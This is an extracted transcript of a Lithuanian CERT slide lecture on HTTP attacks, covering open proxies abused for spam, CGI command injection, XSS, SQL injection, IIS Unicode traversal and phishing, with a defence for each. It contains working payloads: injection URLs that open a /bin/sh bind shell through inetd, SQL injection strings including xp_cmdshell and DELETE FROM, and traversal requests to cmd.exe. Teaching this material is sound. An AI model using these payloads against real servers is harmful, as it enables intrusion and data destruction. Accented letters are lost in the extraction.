Marius Urkis LITNET CERT.

Transkriptas

1 Marius Urkis 1

2 HTTP protokolas HTTP plaiausi pritaikym turintis protokolas Request For Comments RFC1945 RFC2616 RFC2817 HTTP protokolas, gyjs plat pritaikymvairiose srityse. Jis naudojamas: Informacijai gauti, ieškoti, talpinti Finansinms operacijoms atlikti Tvarkyti apartin ir programinrang Pokalbiams Žaidimams... Todl, yra labai svarbu suprasti atakas, vykdomas per HTTP prieš taikomasias programas, prieš tinklo infrastuktr, prieš HTTP protokolo vartotojus. 2

3 Prieš HTTP serverio konfigracij Prieš HTTP taikomsias programas Prieš HTTP serverio saugumo spragas Atakas galima suskirstyti kelias kategorijas: Atakuojama HTTP paslauga (serveris), bandant išnaudoti administratoriaus paliktas klaidas serverio konfigracijoje Atakos gali bti nukreiptos prieš WWW taikomsias programas, kuriose klaidas paliko programuotojai HTTP servisins programos taip pat neretai turi saugumo sprag, kuriomis užpuolikai gali bandyti pasinaudoti 3

4 Skenavimai Dažnai pastebimi skenavimai: Tcp/80 Tcp/8080 Tcp/ :34: :34: :34: :34: :35: :38: Dažnai yra pastebimi SYN skenavimai, kuri paskirtis rasti proxy servisus (TCP/8080, TCP/1080, TCP/3128). Skenuotojai taip pat tikrina ir HTTP paslaugas (TCP/80) 4

5 Skenavimo pavyzdys T xxx :2765 -> yyy.100:8080 [S] T xxx :2765 -> zzz.49:8080 [S] T xxx :2765 -> yy.96:8080 [S] T yy.96:8080 -> xxx :2765 [AR] T xxx :2765 -> zzz.49:3128 [S] T xxx :2765 -> [S] T xxx :2765 -> yy.149:8080 [S] T xxx :2765 -> yyy.100:3128 [S] T xxx :2765 -> hhh.167:1080 [S] T xxx :2765 -> ww.179:3128 [S] T xxx :2765 -> yy.149:3128 [S] T xxx :2765 -> zz.73:3128 [S] T xxx :2765 -> qqq.33:1080 [S] 5

6 Skenavim turinys T 2004/11/16 06:12: ZZ :1996 -> xx.32:80 [AP] CONNECT mx0.domainsite.com:25 HTTP/ T 2004/11/16 06:12: ZZ :1996 -> xx.32:80 [AP] CONNECT mx0.domainsite.com:25 HTTP/ T 2004/11/16 06:12: ZZ :1996 -> xx.32:80 [AP] CONNECT mx0.domainsite.com:25 HTTP/ T XXX : > yyy.101:8080 [AP] CONNECT ZZZ :25 HTTP/1.0..User-Agent: yaph T XXX : > zz.12:8080 [AP] CONNECT ZZZ :25 HTTP/1.0..User-Agent: yaph T XXX : > qq.30:1080 [AP] CONNECT ZZZ :25 HTTP/1.0..User-Agent: yaph Peržirjus toki skenavim aplication lygio turin galima aptikti vien bendr bruož: visi HTTP skenavimai ieško serviso, priimanio CONNECT užklausas. Pagal RFC2616 (HTTP 1.1), CONNECT metodas reikalingas proxy servisams tuneliavimo funkcijai atlikti. Pagal RFC2817 (Upgrading to TLS Within HTTP/1.1), CONNECT metodas yra reikalingas tam, kad bt galima prašyti tunelio per proxy server. CONNECT metodui nurodomas URI, kur turi eiti kompiuterio adresas ir porto numeris, kur norima jungtis. Po CONNECT eiluts gali eiti 0 arba daugiau HTTP antraši eilui. Po dviej tuši eilui proxy serveriui galima sisti tuneliuojamus duomenis. Tame paiame RFC nurodoma, jog reikalinga riboti kokius portus leidžiama atlikti tuneliavim. Tuneliavimas TCP/25 (SMTP) port nurodomas kaip potencialiai pavojingas, kadangi jo pagalba galima masin SPAM platinim. 6

7 Apsaugotos sistemos atsakas T 2004/11/16 07:28: zzz.106:80 -> XX :2463 [AP] HTTP/ Method Not Allowed..Date: Tue, 16 Nov :28:35 GMT..Server: Apache/ (Debian GNU/Linux) mod_jk/1.2.1 PHP/ Allow: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, PATCH, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, TRACE..Connection: close..content-type: text/html; charset=iso <!doctype HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<HTML><HEAD>.<TITLE>405 Method Not Allowed</TITLE>.</HEAD><BODY>.<H1>Method Not Allowed</H1>.The requested method CONNECT is not allowed for the URL /index.html.<p>.<hr>.<address>apache/ Server at ns.domenas.lt Port 80</ADDRESS>.</BODY></HTML>. Tinkamai sutvarkyta ir apsaugota sistema tokius kreipinius atsako klaidos kodu (pvz 405 Method Not Allowed) 7

8 Pažeidžiamos sistemos atsakas T WW :4650 -> xx.193:3128 [AP] CONNECT :25 HTTP/ T xx.193:3128 -> WW :4650 [AP] HTTP/ Connection established..proxy Sistema, leidžianti tokio tipo tuneliavim, užklaus atsako kodu 2XX 8

9 SPAM platinimas T WW :4650 -> xx.193:3128 [AP] CONNECT zz :25 HTTP/ T xx.193:3128 -> WW :4650 [AP] HTTP/ Connection established..proxy T xx.193:3128 -> WW :4650 [AP] 220 YSmtp aaa.bbb.yahoo.com ESMTP T xx.193:3128 -> WW :4650 [AP] 250 aaa.bbb.yahoo.com.. T xx.193:3128 -> WW :4650 [AP] 250 sender <xxxxxxx@yahoo.com> ok.. T WW :4650 -> xx.193:3128 [AP] RCPT TO: <yyyyyyy@geocities.com>.. T WW :4650 -> xx.193:3128 [AP] RCPT TO: <zzzzzzzz@geocities.com>.. T xx.193:3128 -> WW :4650 [AP] 250 recipient <yyyyyyyy@geocities.com> ok.. Skenuotojai aptik tok neapsaugot proxy servis pradeda masin SPAM laišk platinim. 9

10 Piktybiniai proxy YYY.71 TCP/14977 HTTP proxy SMTP TCP/25 XX ZZ Neretai, po silaužimo kompiuter, ar kompiuterio užkrtimo, jame paliekamas pašalinis piktybinis proxy servisas, leidžiantis atlikti masin laišk platinim. Pavyzdyje: silaužta kompiuter YYY.71. Jame paliktas HTTP proxy servisas (TCP/14977) Kompiuteris XX jungiasi YYY.71 ir prašo tuneliuoti srautus ZZ :25 Kompiuteris YYY.71 atlieka prisijungim prie ZZ :

11 Piktybinio proxy pavyzdys T XX : > YYY.71:14977 [AP] CONNECT ZZ :25 HTTP/ T YYY.71: > XX :34734 [AP] HTTP/ Connection established... T XX : > YYY.71:14977 [AP] HELO ynfkgic.. T YYY.71:2787 -> ZZ :25 [AP] HELO ynfkgic.. T ZZ :25 -> YYY.71:2787 [AP] 250 AAA.BBB.CCC.com OK.. T YYY.71: > XX :34734 [AP] 250 AAA.BBB.CCC.com OK

12 Serviso patikrinimas [1] > telnet XX Trying XX Connected to XX.33. Escape character is '^]'. CONNECT smtp.domain.lt:25 http/1.0 HTTP/ Connection established Proxy-agent: WinRoute Pro/ smtp.domain.lt ESMTP daemon lives here Patikrinti, ar serveris neleidžia tuneliavimo 25 port, galima taip: Reikia su klientine telnet programa prisijungti prie serverio HTTP (proxy) porto vesti komand CONNECT smtp_serveris.lt:25 HTTP/1.0 ir dukart paspausti Enter Jei serveris sutvarkytas neteisingai ir leidžia TCP/25 tuneliavim, gaunamas patvirtinimas (HTTP gržinimo kodas 200) bei SMTP serverio pasisveikinimas. 12

13 Serviso patikrinimas [2] > telnet 80 Trying XXX Connected to Escape character is '^]'. CONNECT smtp.domain.lt:25 http/1.0 HTTP/ Method Not Allowed Date: Wed, 01 Dec :34:39 GMT Server: Apache Allow: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, PATCH, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, TRACE Connection: close Content-Type: text/html; charset=iso <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>405 Method Not Allowed</TITLE> </HEAD><BODY> <H1>Method Not Allowed</H1> The requested method CONNECT is not allowed for the URL /index.html.<p> </BODY></HTML> Connection closed by foreign host. Teisingai sutvarkyti serveriai turi gržinti klaidos kod 4XX, pvz: HTTP/ Method Not Allowed 13

14 CGI pažeidžiamumai. Vartotojo vedama informacija /bin/sh Perl system() open() Php Fail vardai ( ) Globals kintamieji Kita atak grup atakos prieš taikomsias programas. Viena išprast programuotoj klaid nepakankama vartotojo vedamos informacijos kontrol. Viena iš pavojingiausi toki sprag leidžia parametrais perduoti serveryje vykdomai programai užslptas komandas, kurios taip pat vykdomos serveryje. Pavyzdžiui: Tokios komandos gali bti perduodamos UNIX shell skriptams, panaudojant specialius simbolius, kuriuos UNIX shell interpretuoja ir paleidžia subshell aplinkas. Perl funkcijoms system(), open() ir panašioms tarp argument padavus specialius shell simbolius, jie taip pat gali bti interpretuoti UNIX shell aplinkoje 14

15 CGI pažeidžiamumai. Pvz [1] #!/usr/bin/perl # use CGI; $query=new CGI; $ip=$query->param('ip'); print $query->header, $query->start_html, $ip,":<p>"; open (OUT, "/bin/ping -c 4 $ip "); while (<OUT>) { print $_,"<br>"; } Pažeidžiamo perl skripto pavyzdys. Šio skripto paskirtis atlikti ryšio testavim, vykdant ping komand su vartotojo perduotu IP adresu. Programa naršyklei perduoda tai, k išveda ping. 15

16 CGI pažeidžiamumai. Pvz [2] : PING ( ) from xxxx : 56(84) bytes of data. 64 bytes from : icmp_seq=1 ttl=64 time=0.172 ms 64 bytes from : icmp_seq=2 ttl=64 time=0.159 ms 64 bytes from : icmp_seq=3 ttl=64 time=0.287 ms 64 bytes from : icmp_seq=4 ttl=64 time=0.175 ms ping statistics packets transmitted, 4 received, 0% loss, time 3016ms rtt min/avg/max/mdev = 0.159/0.198/0.287/0.052 ms Tokio skripto iškvietimas ir išvedama informacija. 16

17 CGI pažeidžiamumai. Pvz [3] XXX.ktu.lt/cgibin/test/test.pl?ip=0 ls%20-l%20/ 0 ls -l /: total 1541 drwxr-xr-x 2 root root 2048 Nov 8 17:53 bin drwxr-xr-x 2 root root 1024 Nov 19 12:08 boot drwxr-xr-x 2 root root 1024 Sep cdrom drwxr-xr-x 9 root root Nov 22 00:03 dev drwxr-xr-x 56 root root 3072 Nov 19 12:10 etc drwxr-xr-x 3 root root 1024 Apr export drwxr-xr-x 2 root root 1024 Sep floppy drwxr-xr-x 15 root root 4096 Oct 15 15:22 home drwxr-xr-x 5 root root 4096 Nov lib drwx root root Sep lost+found Bet, kadangi skripte nra parametr tikrinimo, galima parametrus suformuoti taip, kad serveryje btvykdyta tam tikra vartotojo norima komanda. Pavyzdyje panaudojamas pipe simbolis, ir nurodoma vykdyti komand ls l /. Rezultatas išvedamas serverio šakninio katalogo turinys. 17

18 CGI pažeidžiamumai. Pvz [4] XXX.ktu.lt/cgibin/test/test.pl?ip=0 ls%20-l%20/ open (OUT, "/bin/ping -c 4 0 ls l / "); while (<OUT>) { print $_,"<br>"; } Iš tikro, argumentus staius paduodam parametr reikšmes, serveryje yra vykdoma tokia komamda: "/bin/ping -c 4 0 ls l / Komanda vykdoma tokiomis teismis, kokiomis yra paleistas HTTP servisas. 18

19 CGI pažeidžiamumai. Pvz [5] XXX.ktu.lt/cgibin/test/test.pl?ip=0 echo stream tcp nowait web /bin/sh > /tmp/hck XXX.ktu.lt/cgibin/test/test.pl?ip=0 inetd /tmp/hck Kitas šio skripto spagos išnaudojimo pavyzdys: Pirmasis kreipinys sukuria fail /tmp/hck, kurio turinys: stream tcp nowait web /bin/sh Antras kreipinys paleidžia inetd servis su konfigracija /tmp/hck Šie du žingsniai faktiškai sukuria servis ant porto TCP/11111, prie kurio prisijungus paleidžiamas UNIX shell. 19

20 CGI pažeidžiamumai. Pvz [6] ls -l /tmp/hck -rw-r--r-- 1 web web 36 Nov 22 14:45 /tmp/hck root@xxx:/tmp# ps aux grep inetd root ? S Nov19 0:00 /usr/sbin/inetd web ? S 14:49 0:00 inetd /tmp/hck root@xxx:/tmp# lsof -p 5237 COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME inetd 5237 web cwd DIR 33, / inetd 5237 web rtd DIR 33, / inetd 5237 web txt REG 33, /usr/sbin/inetd inetd 5237 web mem REG 33, /lib/ld so inetd 5237 web mem REG 33, /lib/libc so inetd 5237 web 0u CHR 1, /dev/null inetd 5237 web 1u CHR 1, /dev/null inetd 5237 web 2u CHR 1, /dev/null inetd 5237 web 4u IPv TCP *:11111 (LISTEN) Atlikus šiuos du kreipinius, serveryje atsiranda failas /tmp/hck bei servisas, aptarnaujantis TCP/11111 port. 20

21 Perl: Cgi apsaugojimo priemons perl T use strict; PHP: if (ereg("^[a-z]+\.html$", $id)) { echo "Good!"; Apsisaugoti nuo toki sprag galima tik griežtai tikrinant vartotojvedamus parametrus, HTTP antraštes, cookie reikšmes. Perl kalboje, laikytis griežt programavimo taisykli priveria perl paleidimo raktas T (taint režimas) ir modulis strict. Taint režimas neleidžia nepakankamai patikrintoms parametr reikšmms patekti tam tikr funkcij argumentus. Strict režimas kontroliuoja globali kintamj panaudojim. Rekomenduojama strategija, filtruojant reikšmes iš parametro paimti tik simbolius iš aibs, kuri yra numats programuotojas. Nra rekomenduojama reikšmje ieškoti neleistin simboli ir juos naikinti ar nepraleisti, kadangi toki užbaigt aib numatyti yra sudtingiau. 21

22 Cgi apsaugojimo priemons. Pavyzdys #!/usr/bin/perl -T # $ENV{'PATH'} ='/bin'; use CGI; $query=new CGI; $ip=$query->param('ip'); print $query->header, $query->start_html; print $ip,":<p>"; if ($ip=~ /(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/) { $ip = $1; } else { print "Bad data<p>"; exit; } open (OUT, "/bin/ping -c 4 $ip "); while (<OUT>) { print $_,"<br>"; } Reikšmi filtravimo pavyzdys programuojant su perl Taint režimu. Iš IP parametro reikšms paimami tik tokie simboliai, kurie yra numatyti programuotojo (skaitmenins reikšms ir taškai). 22

23 Cross Site Scripting, CSS/XSS <script>kodas... </script> HTTP <script>kodas... </script> HTTP WWW Chat Skelbim lentos Svei knyga... Kitas dažnai pasitaikantis pažeidžiamumas Cross Site Scripting. Jo esm WWW serverio pagalba terpti www puslapius instrukcijas (javascript, Vbscript), kurias vliau vykdys kito vartotojo naršykl. Paprastai toki atak aukos bna www skelbim lent skaitytojai, pokalbi dalyviai, WWW el. pašto vartotojai. Pavyzdžiui, skelbimo lentoje užpuolikas palieka javascript kod. Kodas yra išsaugojamas WWW serveryje, ir kiekvienas vartotojas, peržirindamas ši skelbim lent, atsisis š javascript kod ir vartotojo naršykl j vykdys. 23

24 CSS pavyzdys Išbandyti CSS veikim galima tinklapyje

25 CSS pavyzdys 25

26 CSS priešnuodžiai. Vartotojui Skript išjungimas Nespausti nuorod el. laiškuose Atsijungti iš tinklapio (logout) prieš jungiantis kitur Vartotojas saugotis nuo CSS atak gali: Naršyklje išjungdamas scripting funkcijas (nepopuliarus sprendimas, apkarpantis naršykls funkcionalum) Vengti sekti nuorodomis, gaunamomis el. paštu ar IRC kanalais) Atsijungti iš tinklapio prieš palikdamas j 26

27 CSS priešnuodžiai. Serveris Programinranga atnaujinama nuolat Vieno prisijungimo (single sign-on) eliminavimas Dinaminio turino filtravimas, paliekant tik leistinus simbolius vedamos informacijos filtravimas, pašalinant neleistinus simbolius: < > % ; ) ( & + - Pagrindins priemons turi bti realizuotos serveryje. Taikomosios programos turi filtruoti simbolius, kuri pagalba galima suformuoti html kod. 27

28 SQL injection SQL instrukcijterpimas WWW tinklapio parametrus taip, kad tos instrukcijos bt vykdytos SQL serveryje Dar viena pavojinga ataka SQL terpimas. Jos esm tarp parametrterpti SQL išraiškas taip, kad jas vykdyt SQL serveris. 28

29 SQL injection. Pavyzdys <b>login Now</b> <form name="login" action="/support/dologin.asp" method="post"> Member Name: <input name="login_member" value=""> Password: <input name= login_password" value="" type="password"> <input name="login_save" value="1" checked="checked" type="checkbox"> Save name and password <input value="log Me In!" type="submit"> </form> Internete dažnai galima sutikti toki HTML form, kurios leidžia vesti prisijungimo vard ir slaptažod. 29

30 SQL injection p_strusername = Request.Form("login_member ") p_strpassword = Request.Form( login_password") strsql = "SELECT * FROM tblusers " & _ "WHERE Username='" & p_strusername & _ "' and Password='" & p_strpassword & "'" SELECT * FROM tblusers WHERE Username= marius' and Password= slaptazodis123 If (aaa.eof) Then Response.Write "Invalid login." Else Response.Write "You are logged in as " & aaa("username") End If Dažnai vartotojai bna saugomi SQL duomen bazse. vesto vardo ir slaptažodžio teisingumo vertinimui yra vykdomas SQL SELECT kreipinys. vedus Login <- marius ir Password <- slaptazodis123 btvykdytas toks SELECT kreipinys: SELECT * FROM tblusers WHERE Username= marius'and Password= slaptazodis

31 SQL injection login_member or a = a login_password or 1=1 -- strsql = "SELECT * FROM tblusers " & _ "WHERE Username='" & p_strusername & _ "' and Password='" & p_strpassword & "'" SELECT * FROM tblusers WHERE Username= or a = a and Password= or 1=1 -- Tok skripto veikim galima pakeisti vedus specialiai parinktas parametr reikšmes. Pavyzdžiui, panaudojus viengubas kabutes ir vedus or instrukcijas gali bti suformuotas toks SELECT sakinys: SELECT * FROM tblusers WHERE Username= or a = a and Password= or 1=1 - - Šio sakinio slyga WHERE yra teisinga visada ir tokio SELECT sakinio rezultatas yra visa vartotoj lentel. Gale vedamas komentaro ženklas eliminuoja pasiliekani kabut Tokiu bdu prie sistemos prisijungiama pirmojo vartotojo, rasto lentelje, teismis 31

32 SQL injection. Variantai ' or 1=1-- " or 1=1-- or 1=1-- ' or 'a'='a " or "a"="a ') or ('a'='a Kiti galimi or instrukcijos vedimo variantai 32

33 SQL injection. Pavyzdžiai ; UPDATE tblusers' SET Password' = 'newpas5' WHERE username='neo' - ; INSERT INTO 'tblusers' ('login_id', username', 'password', 'details') VALUES (666,'neo2','newpas5','NA') - ; DELETE FROM tblusers -- ; exec master..xp_cmdshell 'ping '-- Pasinaudojant SQL terpimo spagomis, galima atlikti ir kitokius veiksmus: Pakeisti esam lentels lauk reikšmes terpti naujus rašus Sunaikinti lentel Vykdyti komandas Ir kita 33

34 SQL injection. Apsauga Filtruoti cookie, formos parametr reikšmes: - ", / \ * & ( ) $ % ~? ; NULL \n \r Tikrinti vedamas reikšmes (ISNUMERIC) Riboti vedamos eiluts ilg Formoms leisti tik POST metod SQL server paleisti su neadministratoriaus privilegijomis Iš SQL serverio pašalinti stored procedures : Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask Apsisaugojant nuo SQL terpimo, svarbiausia tinkamai filtruoti formos parametrus ir kit informacij, kuri gauna skriptas. Kitos galimos priemons tikrinti parametr logik, riboti parametr eiluts ilg, minimizuoti SQL serviso vartotojo privilegijas, pašalinti stored procedures 34

35 Unicode atakos. MS MS IIS tikrina užklausas ir atmeta../ tem32/cmd.exe Po to atliekamas Unicode dekodavimas / atitinka %c0%af innt/system32/cmd.exe Kitas atak tipas atakos, išnaudojanios paio serviso spragas. ia pateiktas pavyzdys MS IIS spragos, kai Unicode kodavimo dka galima apeiti parametr patikrinimus. MS IIS tikrina URL eilut, ar joje nra simboli../. Tokie simboliai leist keliauti po katalog med serveryje ir vykdyti bet kokias programas. Kadangi Unicode dekodavimas atliekamas po šio tikrinimo, Unicode simboliais užkodavus tikrinamus simbolius atak vis tiek pavyksta realizuoti 35

36 CodeRed atakos [01/Oct/2003:11:06: ] "GET /scripts/root.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /MSADC/root.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [01/Oct/2003:11:06: ] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" Tokia ataka palieka savo pdsakus serverio žurnale. 36

37 Phishing Phishing = password fishing = slaptažodži žvejyba Apgaul, siekant išgauti asmenin informacij: Banko korteli informacij Slaptažodžiai Sskait informacija kita Phishing tai nra tipas, o greiiau metodas pulti, panaudojant taip pat ir HTTP atakas (CSS). ia phishing atakos minimos dar ir todl, kad pastaruoju metu pasaulyje j intensyvumas itin išaugo phishing atvej per pus met padaugjo apie 4000%. Vien JAV vartotojai per šiuos metus neteko apie 2 mlrd. USD. Phishing atakos tikslas išgauti asmenin svarbi informacij, toki kaip bank korteli informacija. 37

38 Nuostoliai dl asmenins informacijos grobimo Aukos el. bankininkysts vartotojai (CityBank, SunTrust, ebay, PayPal) Nuostoliai: 2004metais nukentjo 1,8 mln. amerikiei Vidutiniškai nukentj s neteko 1200USD Prarasta apie 2 mlrd. USD Pagrindiniai phishing atak taikiniai elektronins bankininkysts klientai. 38

39 Phishing. Pavyzdys Tipin phishing ataka: Banko klientams išsiuniamas falsifikuotas laiškas, pasirašytas, neva, banko personalo, ir kvieiantis (gal bt dl koki nors problem) apsilankyti banko svetainje bei patvirtinti tam tikr informacij. 39

40 Spragteljus nurodyt nuorod, naršykl nukreipiamregistracijos puslap, kuriame vartotojas prašomas palikti svarbi informacij. Vaizduojama informacija bna pateikiama taip, kad vartotojas bttikinamas svetains autentiškumu. Kaip taisykl, registracijos prisijungimas nebna apsaugotas SSL šifravimu (nra užrakintos spynos piktograma statuso eilutje). 40

41 Kitas falsifikuotos svetains pavyzdys. Kairje originali svetain 41

42 Phishing technologijos This is a multi-part message in MIME format Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit <html><p><font face="arial"> <A HREF=" <map name="fpmap0"> <area coords="0, 0, 610, 275" shape="rect" href=" %35:%33%31%32%37/%63%69%74/%69%6E%64%65%78%2E%68%74%6D"> </map><img SRC="cid:part @usersupport07@citibank.com" border="0" usemap="#fpmap0"></a></a></font></p><p> <font color="#fffff6">in 1870 Supercuts pays I am on a Yes, I don't mind I wish </font></p></html> Dažnai, norint suklaidinti vartotoj imamasi toki technologij: terpiamas image map paveiksllis, kurio nuoroda nukreipiama original banko tinklap (tai yra adresas, kur rodo el. pašto skaitymo programa). Tuo tarpu image map mechanizmas paspaudus nukreipia pašalin tinklap. Piktybinio tinklapio, surenkanio korteli informacij, adresas neretai užkoduojamas šešioliktainmis simboli reikšmmis. Tai turi nešti papildomos painiavos vartotojui. 42

43 Dekodavimas <area coords="0, 0, 610, 275" shape="rect" href=" %2E%31%33%35:%33%31%32%37/%63%69%74/%69% 6E%64%65%78%2E%68%74%6D"> </map> > echo 63%69%74/%69%6E%64%65%78%2E%68%74%6D perl -e 'while (<>) { s/%(..)/pack("c", hex($1))/eg; print;} Tok užkoduot adres galima dekoduoti panaudojant perl skript. 43